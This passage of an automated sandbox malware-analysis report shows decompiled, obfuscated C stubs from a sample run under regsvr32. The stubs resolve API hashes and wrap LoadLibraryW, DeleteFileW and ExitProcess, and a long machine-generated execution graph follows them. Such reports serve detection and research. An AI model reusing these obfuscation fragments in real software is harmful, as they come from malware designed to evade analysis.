                                                                                                                • Opcode ID: e4284d99b965fec255e6808552047daee7f3e91d1dd390b6355c9cd29ba91f34
                                                                                                                • Instruction ID: 9795ba84f9b76a0b65f46000c5467e785a8c5da4a80aac4d71f9c3cdbcf10291
                                                                                                                • Opcode Fuzzy Hash: e4284d99b965fec255e6808552047daee7f3e91d1dd390b6355c9cd29ba91f34
                                                                                                                • Instruction Fuzzy Hash: 941144B2800209FBCF15DF95CC0A8DEBFB8FF85304F108198E92962210D3B18A64DB90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 88%
                                                                                                                			E0057FCB5(void* __ecx, WCHAR* __edx, intOrPtr _a4) {
                                                                                                                				signed int _v8;
                                                                                                                				signed int _v12;
                                                                                                                				signed int _v16;
                                                                                                                				signed int _v20;
                                                                                                                				void* _t36;
                                                                                                                				struct HINSTANCE__* _t47;
                                                                                                                				signed int _t49;
                                                                                                                				signed int _t50;
                                                                                                                				WCHAR* _t57;
                                                                                                                
                                                                                                                				_push(_a4);
                                                                                                                				_t57 = __edx;
                                                                                                                				_push(__edx);
                                                                                                                				E00579E7D(_t36);
                                                                                                                				_v20 = 0x4781cd;
                                                                                                                				_t49 = 7;
                                                                                                                				_v20 = _v20 / _t49;
                                                                                                                				_v20 = _v20 ^ 0x0004a997;
                                                                                                                				_v8 = 0x9f6121;
                                                                                                                				_v8 = _v8 | 0x04abbfea;
                                                                                                                				_v8 = _v8 ^ 0x44133d53;
                                                                                                                				_v8 = _v8 ^ 0x40a32c45;
                                                                                                                				_v16 = 0x791f5b;
                                                                                                                				_t50 = 0x6e;
                                                                                                                				_v16 = _v16 / _t50;
                                                                                                                				_v16 = _v16 ^ 0x000d135a;
                                                                                                                				_v12 = 0x90c5d0;
                                                                                                                				_v12 = _v12 ^ 0x2cafc93f;
                                                                                                                				_v12 = _v12 ^ 0x2c381e09;
                                                                                                                				E0058BFF0(0xac802c42, 0x347, _t50, _t50, 0xede26741);
                                                                                                                				_t47 = LoadLibraryW(_t57); // executed
                                                                                                                				return _t47;
                                                                                                                			}













                                                                                                                APIs
                                                                                                                • LoadLibraryW.KERNEL32(00000000,?,?,?,?,?,?,00000000), ref: 0057FD58
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.462862121.0000000000571000.00000020.00000800.00020000.00000000.sdmp, Offset: 00570000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.462859273.0000000000570000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                • Associated: 00000006.00000002.462874695.0000000000594000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_570000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: LibraryLoad
                                                                                                                • String ID:
                                                                                                                • API String ID: 1029625771-0
                                                                                                                • Opcode ID: 8bacd117322b64fd42504966482242d0bc11aa74408019ed1aecf2da1c0dea5e
                                                                                                                • Instruction ID: f693ba9b46c169cdccc511a9151447d22b4167d72faa0ee6678c04fffa9efa1d
                                                                                                                • Opcode Fuzzy Hash: 8bacd117322b64fd42504966482242d0bc11aa74408019ed1aecf2da1c0dea5e
                                                                                                                • Instruction Fuzzy Hash: 02112E75D00218EBDB18DFA5D84A8EEBFB9EB44304F10C189E429A6251DBB56B148B91
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 84%
                                                                                                                			E00579EA8(WCHAR* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                				signed int _v8;
                                                                                                                				signed int _v12;
                                                                                                                				signed int _v16;
                                                                                                                				signed int _v20;
                                                                                                                				void* _t35;
                                                                                                                				int _t42;
                                                                                                                				WCHAR* _t46;
                                                                                                                
                                                                                                                				_push(_a8);
                                                                                                                				_t46 = __ecx;
                                                                                                                				_push(_a4);
                                                                                                                				_push(__ecx);
                                                                                                                				E00579E7D(_t35);
                                                                                                                				_v20 = 0xb0cce;
                                                                                                                				_v20 = _v20 + 0xffff00ee;
                                                                                                                				_v20 = _v20 ^ 0x0007bd05;
                                                                                                                				_v12 = 0x1e8fca;
                                                                                                                				_v12 = _v12 >> 6;
                                                                                                                				_v12 = _v12 << 8;
                                                                                                                				_v12 = _v12 + 0xffff1da9;
                                                                                                                				_v12 = _v12 ^ 0x0077171f;
                                                                                                                				_v16 = 0xc679b7;
                                                                                                                				_v16 = _v16 + 0x38bf;
                                                                                                                				_v16 = _v16 ^ 0x00cf762a;
                                                                                                                				_v8 = 0xa3ba51;
                                                                                                                				_v8 = _v8 ^ 0xa0d3ead1;
                                                                                                                				_v8 = _v8 + 0xe688;
                                                                                                                				_v8 = _v8 + 0xffff6d73;
                                                                                                                				_v8 = _v8 ^ 0xa079263d;
                                                                                                                				E0058BFF0(0xac802c42, 0x385, __ecx, __ecx, 0x77e9f533);
                                                                                                                				_t42 = DeleteFileW(_t46); // executed
                                                                                                                				return _t42;
                                                                                                                			}











                                                                                                                APIs
                                                                                                                • DeleteFileW.KERNEL32(?,?,?,?,?,?,?,00E39F9E,00000000), ref: 00579F51
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.462862121.0000000000571000.00000020.00000800.00020000.00000000.sdmp, Offset: 00570000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.462859273.0000000000570000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                • Associated: 00000006.00000002.462874695.0000000000594000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_570000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: DeleteFile
                                                                                                                • String ID:
                                                                                                                • API String ID: 4033686569-0
                                                                                                                • Opcode ID: 05b63ea037540c08496bef69ee0cecfed80cfa419fc6bd7bfec422803f2d9975
                                                                                                                • Instruction ID: b45158ee1e84531d91aea40301993c08f3e2436f424bdb46f1077d9ea384dee9
                                                                                                                • Opcode Fuzzy Hash: 05b63ea037540c08496bef69ee0cecfed80cfa419fc6bd7bfec422803f2d9975
                                                                                                                • Instruction Fuzzy Hash: D91118B1C11619EBDF48DFA4D94A8DEBBB8FF10318F108288E825A6250E7B45B549F91
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 92%
                                                                                                                			E0057BA9C(int _a12) {
                                                                                                                				signed int _v8;
                                                                                                                				signed int _v12;
                                                                                                                				signed int _v16;
                                                                                                                				unsigned int _v20;
                                                                                                                				void* _t34;
                                                                                                                
                                                                                                                				_v20 = 0x6b4597;
                                                                                                                				_v20 = _v20 >> 2;
                                                                                                                				_v20 = _v20 ^ 0x00116e69;
                                                                                                                				_v16 = 0x7d3df7;
                                                                                                                				_v16 = _v16 << 3;
                                                                                                                				_v16 = _v16 ^ 0x03ee9fa4;
                                                                                                                				_v12 = 0x7e0c35;
                                                                                                                				_v12 = _v12 ^ 0xa2581e84;
                                                                                                                				_v12 = _v12 ^ 0xa22bc007;
                                                                                                                				_v8 = 0xada9ee;
                                                                                                                				_push(_t34);
                                                                                                                				_v8 = _v8 * 0x61;
                                                                                                                				_v8 = _v8 << 0xb;
                                                                                                                				_v8 = _v8 ^ 0x6b103fde;
                                                                                                                				E0058BFF0(0xac802c42, 0x166, _t34, _t34, 0x80a33dd2);
                                                                                                                				ExitProcess(_a12);
                                                                                                                			}









                                                                                                                APIs
                                                                                                                • ExitProcess.KERNEL32(00116E69), ref: 0057BB1D
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.462862121.0000000000571000.00000020.00000800.00020000.00000000.sdmp, Offset: 00570000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.462859273.0000000000570000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.462874695.0000000000594000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_570000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: ExitProcess
                                                                                                                • String ID:
                                                                                                                • API String ID: 621844428-0
                                                                                                                • Opcode ID: 5a29f8c2dfa274dc4c38ec6c4fc52361ad96745e54715afb883c837706f91096
                                                                                                                • Instruction ID: ededd5ed7f021805f1beedc813203e784e5de74c6cef3b2848e4f4118dbf0cb7
                                                                                                                • Opcode Fuzzy Hash: 5a29f8c2dfa274dc4c38ec6c4fc52361ad96745e54715afb883c837706f91096
                                                                                                                • Instruction Fuzzy Hash: 07010475D1120CEB8B04DFA4CA4A9DEBBB4FF04348F108599E821B7211D7B55B04CF81
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Execution Graph

                                                                                                                Execution Coverage:16.7%
                                                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                                                Signature Coverage:0%
                                                                                                                Total number of Nodes:1056
                                                                                                                Total number of Limit Nodes:17
API calls 4321->4322 4323 1cc4eb 2 API calls 4321->4323 4325 1cf2b9 GetPEB 4321->4325 4330 1db14e 4321->4330 4334 1d13d4 4321->4334 4338 1da3e6 4321->4338 4322->4321 4323->4321 4325->4321 4327 1c411c 4326->4327 4328 1dbff0 GetPEB 4327->4328 4329 1c419f 4328->4329 4329->3963 4331 1db16a 4330->4331 4332 1dbff0 GetPEB 4331->4332 4333 1db205 4332->4333 4333->4321 4335 1d140f 4334->4335 4336 1dbff0 GetPEB 4335->4336 4337 1d14bb 4336->4337 4337->4321 4339 1da415 4338->4339 4340 1dbff0 GetPEB 4339->4340 4341 1da4a0 4340->4341 4341->4321 4343 1c4640 4342->4343 4346 1d1d1c 4343->4346 4347 1d1d3a 4346->4347 4350 1c2fe6 4347->4350 4351 1c3002 4350->4351 4352 1dbff0 GetPEB 4351->4352 4353 1c30ae 4352->4353 4353->3981 4355 1cfff1 4354->4355 4356 1dbff0 GetPEB 4355->4356 4357 1d008b 4356->4357 4357->4000 4368 1d5d94 4358->4368 4359 1d63d3 4378 1c428c 4359->4378 4361 1d63d1 4361->4000 4362 1c4bb4 RtlAllocateHeap GetPEB 4362->4368 4365 1d734a GetPEB 4365->4368 4366 1cfd5f GetPEB 4366->4368 4367 1d5d68 2 API calls 4367->4368 4368->4359 4368->4361 4368->4362 4368->4365 4368->4366 4368->4367 4369 1cb9d7 GetPEB 4368->4369 4370 1cfa6c 4368->4370 4374 1cfe4b 4368->4374 4369->4368 4371 1cfa85 4370->4371 4372 1dbff0 GetPEB 4371->4372 4373 1cfb15 4372->4373 4373->4368 4375 1cfe5e 4374->4375 4376 1dbff0 GetPEB 4375->4376 4377 1cfef3 4376->4377 4377->4368 4379 1c42a5 4378->4379 4380 1dbff0 GetPEB 4379->4380 4381 1c4337 4380->4381 4381->4361 4383 1cc635 4382->4383 4385 1cc61f 4382->4385 4383->4005 4384 1c6a8d GetPEB 4384->4385 4385->4383 4385->4384 4387 1d5047 4386->4387 4400 1d0b4c 4387->4400 4395 1e252f 4390->4395 4391 1c4bb4 2 API calls 4391->4395 4392 1e2704 4392->4005 4393 1e26f3 4394 1c6a8d GetPEB 4393->4394 4394->4392 4395->4391 4395->4392 4395->4393 4397 1deaa3 2 API calls 4395->4397 4398 1cb9d7 GetPEB 4395->4398 4502 1dacff 4395->4502 4506 1cc453 4395->4506 4397->4395 4398->4395 4406 1d0b68 4400->4406 4402 1d0c59 4404 1c6a8d GetPEB 4402->4404 4405 1d0c57 4404->4405 4405->4005 
4406->4402 4406->4405 4407 1deaa3 2 API calls 4406->4407 4409 1c7786 4406->4409 4426 1c508b 4406->4426 4435 1c3210 4406->4435 4407->4406 4425 1c842c 4409->4425 4410 1c88b0 4411 1cd5cb GetPEB 4410->4411 4414 1c88ae 4411->4414 4413 1cf36a GetPEB 4413->4425 4414->4406 4417 1c4bb4 RtlAllocateHeap GetPEB 4417->4425 4422 1d1d1c GetPEB 4422->4425 4423 1cd68b GetPEB 4423->4425 4424 1cb9d7 GetPEB 4424->4425 4425->4410 4425->4413 4425->4414 4425->4417 4425->4422 4425->4423 4425->4424 4440 1c9f58 4425->4440 4444 1cbd30 4425->4444 4448 1cb40a 4425->4448 4452 1cfd9d 4425->4452 4456 1d7473 4425->4456 4482 1c4d7d 4425->4482 4486 1d677f 4425->4486 4427 1c55c3 4426->4427 4428 1c575d 4427->4428 4430 1c4bb4 RtlAllocateHeap GetPEB 4427->4430 4431 1c575b 4427->4431 4432 1cb40a GetPEB 4427->4432 4433 1cd68b GetPEB 4427->4433 4434 1cb9d7 GetPEB 4427->4434 4429 1cd5cb GetPEB 4428->4429 4429->4431 4430->4427 4431->4406 4432->4427 4433->4427 4434->4427 4436 1d677f GetPEB 4435->4436 4437 1c329c 4436->4437 4438 1c6a8d GetPEB 4437->4438 4439 1c32af 4438->4439 4439->4406 4441 1c9f7a 4440->4441 4442 1dbff0 GetPEB 4441->4442 4443 1ca009 4442->4443 4443->4425 4445 1cbd52 4444->4445 4446 1dbff0 GetPEB 4445->4446 4447 1cbdf5 4446->4447 4447->4425 4449 1cb43a 4448->4449 4450 1dbff0 GetPEB 4449->4450 4451 1cb4e0 4450->4451 4451->4425 4453 1cfdb3 4452->4453 4454 1dbff0 GetPEB 4453->4454 4455 1cfe3d 4454->4455 4455->4425 4457 1d8307 4456->4457 4458 1cd5cb GetPEB 4457->4458 4459 1d8558 4457->4459 4460 1c6a8d GetPEB 4457->4460 4461 1d87d6 4457->4461 4462 1deaa3 2 API calls 4457->4462 4468 1c4bb4 RtlAllocateHeap GetPEB 4457->4468 4469 1cb9d7 GetPEB 4457->4469 4479 1d86af 4457->4479 4490 1c8ab6 4457->4490 4494 1c65d5 4457->4494 4458->4457 4463 1c4bb4 2 API calls 4459->4463 4460->4457 4461->4425 4462->4457 4466 1d8578 4463->4466 4465 1c4bb4 RtlAllocateHeap GetPEB 4465->4479 4467 1c4bb4 2 API calls 4466->4467 4471 1d859a 4467->4471 4468->4457 4469->4457 4470 1cd68b GetPEB 4470->4479 4472 1dade9 GetPEB 
4471->4472 4475 1d85c6 4472->4475 4474 1cb9d7 GetPEB 4474->4479 4498 1dcfc3 4475->4498 4478 1cb9d7 GetPEB 4480 1d8697 4478->4480 4479->4465 4479->4470 4479->4474 4481 1cb9d7 GetPEB 4480->4481 4481->4479 4483 1c4dad 4482->4483 4484 1dbff0 GetPEB 4483->4484 4485 1c4e5c 4484->4485 4485->4425 4487 1d6792 4486->4487 4488 1dbff0 GetPEB 4487->4488 4489 1d6834 4488->4489 4489->4425 4491 1c8af6 4490->4491 4492 1dbff0 GetPEB 4491->4492 4493 1c8baa 4492->4493 4493->4457 4495 1c6602 4494->4495 4496 1dbff0 GetPEB 4495->4496 4497 1c6697 4496->4497 4497->4457 4499 1dcff4 4498->4499 4500 1dbff0 GetPEB 4499->4500 4501 1d8667 4500->4501 4501->4478 4503 1dad1f 4502->4503 4504 1deaa3 2 API calls 4503->4504 4505 1dad9c 4504->4505 4505->4395 4507 1cc481 4506->4507 4508 1cf56b GetPEB 4507->4508 4509 1cc4a8 4508->4509 4509->4395 4511 1e0343 4510->4511 4512 1dbff0 GetPEB 4511->4512 4513 1e03e4 4512->4513 4513->4013 4515 1daa83 4514->4515 4516 1dbff0 GetPEB 4515->4516 4517 1dab22 4516->4517 4517->4013 4529 1d3cdd 4518->4529 4522 1d0c9d 4521->4522 4552 1cf43b 4522->4552 4527 1de373 2 API calls 4528 1d0e00 4527->4528 4528->4022 4532 1d3d02 4529->4532 4535 1cba93 4532->4535 4536 1d3f17 4532->4536 4538 1c5942 4532->4538 4541 1d1a72 4532->4541 4545 1defa0 4532->4545 4549 1cb34c 4532->4549 4535->4022 4537 1de373 2 API calls 4536->4537 4537->4535 4539 1c588d GetPEB 4538->4539 4540 1c597a 4539->4540 4540->4532 4542 1d1a88 4541->4542 4543 1dbff0 GetPEB 4542->4543 4544 1d1b14 4543->4544 4544->4532 4546 1defb9 4545->4546 4547 1dbff0 GetPEB 4546->4547 4548 1df052 4547->4548 4548->4532 4550 1dbff0 GetPEB 4549->4550 4551 1cb3f2 4550->4551 4551->4532 4553 1dbff0 GetPEB 4552->4553 4554 1cf4f2 4553->4554 4554->4528 4555 1d14da 4554->4555 4556 1d14f9 4555->4556 4557 1dbff0 GetPEB 4556->4557 4558 1d0dee 4557->4558 4558->4527 4560 1c3f42 4559->4560 4561 1dbff0 GetPEB 4560->4561 4562 1c3ff1 4561->4562 4562->4034 4564 1e1cd8 4563->4564 4565 1dbff0 GetPEB 4564->4565 4566 1e1d53 4565->4566 4566->4034 4568 1c3169 
4567->4568 4569 1dbff0 GetPEB 4568->4569 4570 1c3203 4569->4570 4570->4034 4587 1ca07f 4571->4587 4573 1d5b4c GetPEB 4573->4587 4574 1cb074 4668 1d5b4c 4574->4668 4577 1c4bb4 2 API calls 4577->4587 4578 1cb08a 4578->4045 4583 1c6a8d GetPEB 4583->4587 4584 1cb9d7 GetPEB 4584->4587 4585 1de29a GetPEB 4585->4587 4587->4573 4587->4574 4587->4577 4587->4578 4587->4583 4587->4584 4587->4585 4636 1d41cf 4587->4636 4645 1c5797 4587->4645 4649 1c5b8a 4587->4649 4652 1c6505 4587->4652 4656 1c400f 4587->4656 4660 1daeae 4587->4660 4664 1db215 4587->4664 4596 1e2a55 4588->4596 4590 1e2bb0 4592 1c6a8d GetPEB 4590->4592 4591 1deaa3 2 API calls 4591->4596 4593 1e2bae 4592->4593 4593->4045 4594 1c4bb4 2 API calls 4594->4596 4595 1cf56b GetPEB 4595->4596 4596->4590 4596->4591 4596->4593 4596->4594 4596->4595 4597 1cb9d7 GetPEB 4596->4597 4680 1d51e8 4596->4680 4597->4596 4613 1d9fc8 4598->4613 4599 1c6a8d GetPEB 4599->4613 4600 1da353 4601 1de18b 2 API calls 4600->4601 4604 1da379 4601->4604 4602 1deaa3 RtlAllocateHeap GetPEB 4602->4613 4603 1d1d1c GetPEB 4603->4613 4699 1cc4b0 4604->4699 4606 1da34e 4606->4045 4608 1c4bb4 2 API calls 4608->4613 4611 1cb9d7 GetPEB 4611->4606 4612 1cf56b GetPEB 4612->4613 4613->4599 4613->4600 4613->4602 4613->4603 4613->4606 4613->4608 4613->4612 4614 1cb9d7 GetPEB 4613->4614 4691 1de18b 4613->4691 4695 1d9556 4613->4695 4614->4613 4622 1d91ae 4615->4622 4617 1d9537 4618 1c6a8d GetPEB 4617->4618 4619 1d9535 4618->4619 4619->4045 4621 1deaa3 2 API calls 4621->4622 4622->4617 4622->4619 4622->4621 4623 1d1d1c GetPEB 4622->4623 4703 1d16ad 4622->4703 4709 1c9617 4622->4709 4623->4622 4635 1d47fd 4624->4635 4625 1d500a 4629 1c6a8d GetPEB 4625->4629 4632 1d501e 4629->4632 4630 1c6a8d GetPEB 4630->4635 4631 1ce379 2 API calls 4631->4635 4632->4045 4633 1d1d1c GetPEB 4633->4635 4634 1deaa3 2 API calls 4634->4635 4635->4625 4635->4630 4635->4631 4635->4632 4635->4633 4635->4634 4751 1c4342 4635->4751 4756 1da4b5 4635->4756 4763 1c8bcb 4635->4763 4637 
1d4420 4636->4637 4638 1d4518 4637->4638 4642 1deaa3 RtlAllocateHeap GetPEB 4637->4642 4643 1d1d1c GetPEB 4637->4643 4644 1c6a8d GetPEB 4637->4644 4672 1c7209 4637->4672 4640 1d4520 4638->4640 4641 1c6a8d GetPEB 4638->4641 4640->4587 4641->4640 4642->4637 4643->4637 4644->4637 4646 1c57d2 4645->4646 4647 1dbff0 GetPEB 4646->4647 4648 1c5872 4647->4648 4648->4587 4676 1e1933 4649->4676 4653 1c652a 4652->4653 4654 1dbff0 GetPEB 4653->4654 4655 1c65c3 4654->4655 4655->4587 4657 1c4036 4656->4657 4658 1dbff0 GetPEB 4657->4658 4659 1c40bd 4658->4659 4659->4587 4661 1daedf 4660->4661 4662 1dbff0 GetPEB 4661->4662 4663 1daf74 4662->4663 4663->4587 4665 1db237 4664->4665 4666 1dbff0 GetPEB 4665->4666 4667 1db2e9 4666->4667 4667->4587 4669 1d5b62 4668->4669 4670 1dbff0 GetPEB 4669->4670 4671 1d5bfa 4670->4671 4671->4578 4673 1c722b 4672->4673 4674 1dbff0 GetPEB 4673->4674 4675 1c72b9 4674->4675 4675->4637 4677 1e1957 4676->4677 4678 1dbff0 GetPEB 4677->4678 4679 1c5c87 4678->4679 4679->4587 4684 1d51fe 4680->4684 4681 1d545d 4683 1cc63a GetPEB 4681->4683 4682 1d545b 4682->4596 4683->4682 4684->4681 4684->4682 4686 1deaa3 2 API calls 4684->4686 4687 1cc63a 4684->4687 4686->4684 4688 1cc662 4687->4688 4689 1dbff0 GetPEB 4688->4689 4690 1cc6f0 4689->4690 4690->4684 4692 1de1a5 4691->4692 4693 1deaa3 2 API calls 4692->4693 4694 1de230 4693->4694 4694->4613 4696 1d957e 4695->4696 4697 1cf56b GetPEB 4696->4697 4698 1d95a0 4697->4698 4698->4613 4700 1cc4c9 4699->4700 4701 1cf56b GetPEB 4700->4701 4702 1cc4e3 4701->4702 4702->4611 4705 1d16c7 4703->4705 4704 1d18a9 4731 1d595c 4704->4731 4705->4704 4706 1d18a7 4705->4706 4716 1ce379 4705->4716 4706->4622 4711 1c9644 4709->4711 4710 1deaa3 2 API calls 4710->4711 4711->4710 4712 1d12ef GetPEB 4711->4712 4713 1c9985 4711->4713 4714 1c9996 4711->4714 4712->4711 4715 1c6a8d GetPEB 4713->4715 4714->4622 4715->4714 4729 1ce3b8 4716->4729 4717 1cf19d 4718 1cd5cb GetPEB 4717->4718 4723 1cf19b 4718->4723 4719 1c4bb4 RtlAllocateHeap GetPEB 
4719->4729 4721 1deaa3 2 API calls 4721->4729 4723->4705 4724 1c65d5 GetPEB 4724->4729 4726 1c6a8d GetPEB 4726->4729 4728 1cd68b GetPEB 4728->4729 4729->4717 4729->4719 4729->4721 4729->4723 4729->4724 4729->4726 4729->4728 4730 1cb9d7 GetPEB 4729->4730 4735 1c41c6 4729->4735 4739 1cb8f4 4729->4739 4743 1cfb23 4729->4743 4747 1dac2c 4729->4747 4730->4729 4732 1d5988 4731->4732 4733 1dbff0 GetPEB 4732->4733 4734 1d5a2b 4733->4734 4734->4706 4736 1c41eb 4735->4736 4737 1dbff0 GetPEB 4736->4737 4738 1c4279 4737->4738 4738->4729 4740 1cb919 4739->4740 4741 1dbff0 GetPEB 4740->4741 4742 1cb9c4 4741->4742 4742->4729 4744 1cfb3c 4743->4744 4745 1dbff0 GetPEB 4744->4745 4746 1cfbed 4745->4746 4746->4729 4748 1dac56 4747->4748 4749 1dbff0 GetPEB 4748->4749 4750 1dace2 4749->4750 4750->4729 4753 1c4361 4751->4753 4752 1c4627 GetPEB 4752->4753 4753->4752 4754 1c45f4 4753->4754 4755 1deaa3 2 API calls 4753->4755 4754->4635 4755->4753 4758 1da4e1 4756->4758 4757 1de436 GetPEB 4757->4758 4758->4757 4759 1deaa3 2 API calls 4758->4759 4760 1da861 4758->4760 4762 1da872 4758->4762 4759->4758 4761 1c6a8d GetPEB 4760->4761 4761->4762 4762->4635 4764 1c8bde 4763->4764 4765 1d1d1c GetPEB 4764->4765 4766 1c8c72 4765->4766 4766->4635 4769 1e041a 4767->4769 4770 1e0738 4769->4770 4771 1e06d7 4769->4771 4788 1c6bfa 4769->4788 4770->4049 4772 1de18b 2 API calls 4771->4772 4773 1e06f1 4772->4773 4779 1d112d 4773->4779 4778 1cb9d7 GetPEB 4778->4770 4792 1c4b09 4779->4792 4781 1d12e4 4784 1def56 4781->4784 4785 1def7b 4784->4785 4786 1cf56b GetPEB 4785->4786 4787 1def98 4786->4787 4787->4778 4789 1c6c16 4788->4789 4790 1dbff0 GetPEB 4789->4790 4791 1c6cad 4790->4791 4791->4769 4793 1c4b23 4792->4793 4794 1dbff0 GetPEB 4793->4794 4795 1c4ba7 4794->4795 4795->4781 4796 1d683f 4795->4796 4797 1d6871 4796->4797 4798 1dbff0 GetPEB 4797->4798 4799 1d6911 4798->4799 4799->4781 4804 1cbcba 4800->4804 4801 1cbd24 4801->4060 4802 1c4cb9 GetPEB 4802->4804 4803 1c6a8d GetPEB 4803->4804 4804->4801 
4804->4802 4804->4803 4806 1de373 2 API calls 4804->4806 4894 1d0f7a 4804->4894 4806->4804 4813 1e0d01 4807->4813 4808 1e0d19 4902 1d63f0 4808->4902 4809 1c9574 GetPEB 4809->4813 4811 1e0d42 4811->4060 4812 1cffde GetPEB 4812->4813 4813->4808 4813->4809 4813->4811 4813->4812 4815 1c4bb4 2 API calls 4813->4815 4816 1d734a GetPEB 4813->4816 4817 1cb9d7 GetPEB 4813->4817 4912 1cb200 4813->4912 4916 1c9b80 4813->4916 4815->4813 4816->4813 4817->4813 4931 1de034 4819->4931 4821 1d63f0 3 API calls 4837 1dfedc 4821->4837 4822 1d66c2 2 API calls 4822->4837 4823 1e02ff 4826 1de373 2 API calls 4823->4826 4824 1dade9 GetPEB 4824->4837 4825 1d51e8 2 API calls 4825->4837 4828 1e02fd 4826->4828 4828->4060 4830 1c9574 GetPEB 4830->4837 4831 1d1bed GetPEB 4831->4837 4832 1c6a8d GetPEB 4832->4837 4833 1cffde GetPEB 4833->4837 4834 1cb200 GetPEB 4834->4837 4835 1c4bb4 RtlAllocateHeap GetPEB 4835->4837 4836 1d734a GetPEB 4836->4837 4837->4821 4837->4822 4837->4823 4837->4824 4837->4825 4837->4828 4837->4830 4837->4831 4837->4832 4837->4833 4837->4834 4837->4835 4837->4836 4838 1cb9d7 GetPEB 4837->4838 4839 1c9b80 3 API calls 4837->4839 4934 1cf784 4837->4934 4940 1cd7a6 4837->4940 4838->4837 4839->4837 4857 1c2bc8 4840->4857 4841 1d63f0 3 API calls 4841->4857 4844 1c9574 GetPEB 4844->4857 4845 1c30be GetPEB 4845->4857 4847 1cffde GetPEB 4847->4857 4848 1c2c16 4850 1de373 2 API calls 4848->4850 4849 1de373 GetPEB CloseHandle 4849->4857 4851 1c2c31 4850->4851 4851->4060 4852 1cb200 GetPEB 4852->4857 4853 1c4bb4 2 API calls 4853->4857 4854 1d734a GetPEB 4854->4857 4855 1cb9d7 GetPEB 4855->4857 4856 1c9b80 3 API calls 4856->4857 4857->4841 4857->4844 4857->4845 4857->4847 4857->4848 4857->4849 4857->4851 4857->4852 4857->4853 4857->4854 4857->4855 4857->4856 4944 1e0e6d 4857->4944 4952 1cfbf8 4857->4952 4955 1cdb59 4857->4955 4864 1cd206 4858->4864 4859 1daa59 GetPEB 4859->4864 4860 1cd24f 4860->4060 4861 1cd23b 4863 1d0f7a GetPEB 4861->4863 4863->4860 4864->4859 4864->4860 4864->4861 
4986 1c3c51 4864->4986 4994 1d0e0b 4864->4994 4872 1e1738 4866->4872 4867 1daa59 GetPEB 4867->4872 4868 1e1781 4868->4060 4869 1e176d 4871 1d0f7a GetPEB 4869->4871 4870 1c3c51 GetPEB 4870->4872 4871->4868 4872->4867 4872->4868 4872->4869 4872->4870 4873 1d0e0b GetPEB 4872->4873 4873->4872 4875 1d710c 4874->4875 4876 1c9574 GetPEB 4875->4876 4877 1d7210 4875->4877 4878 1d7128 4875->4878 4880 1cffde GetPEB 4875->4880 4883 1cb200 GetPEB 4875->4883 4886 1c4bb4 2 API calls 4875->4886 4889 1d734a GetPEB 4875->4889 4892 1cb9d7 GetPEB 4875->4892 4893 1c9b80 3 API calls 4875->4893 4876->4875 4877->4060 4877->4877 4879 1d66c2 2 API calls 4878->4879 4881 1d715b 4879->4881 4880->4875 4882 1c4bb4 2 API calls 4881->4882 4884 1d717e 4882->4884 4883->4875 4885 1d734a GetPEB 4884->4885 4887 1d71be 4885->4887 4886->4875 4888 1cb9d7 GetPEB 4887->4888 4890 1d71d6 4888->4890 4889->4875 4891 1d63f0 3 API calls 4890->4891 4891->4877 4892->4875 4893->4875 4895 1d0f8d 4894->4895 4898 1e1bd6 4895->4898 4899 1e1bf5 4898->4899 4900 1dbff0 GetPEB 4899->4900 4901 1d1069 4900->4901 4901->4804 4903 1d641e 4902->4903 4904 1cb184 GetPEB 4903->4904 4905 1d663b 4904->4905 4923 1d46e0 4905->4923 4907 1d6683 4907->4811 4908 1d6676 4908->4907 4909 1de373 2 API calls 4908->4909 4910 1d66a3 4909->4910 4911 1de373 2 API calls 4910->4911 4911->4907 4913 1cb219 4912->4913 4914 1cf2b9 GetPEB 4913->4914 4915 1cb2e7 4914->4915 4915->4813 4917 1c9b9f 4916->4917 4919 1c9e5e 4917->4919 4920 1dbf1c 2 API calls 4917->4920 4922 1c9e5c 4917->4922 4927 1d454e 4917->4927 4921 1de373 2 API calls 4919->4921 4920->4917 4921->4922 4922->4813 4924 1d471e 4923->4924 4925 1dbff0 GetPEB 4924->4925 4926 1d47b3 CreateProcessW 4925->4926 4926->4908 4928 1d4575 4927->4928 4929 1dbff0 GetPEB 4928->4929 4930 1d4615 4929->4930 4930->4917 4932 1dbff0 GetPEB 4931->4932 4933 1de0c1 4932->4933 4933->4837 4937 1cf7a0 4934->4937 4935 1cf985 4938 1c4627 GetPEB 4935->4938 4936 1cf983 4936->4837 4937->4935 4937->4936 4939 1deaa3 2 API calls 
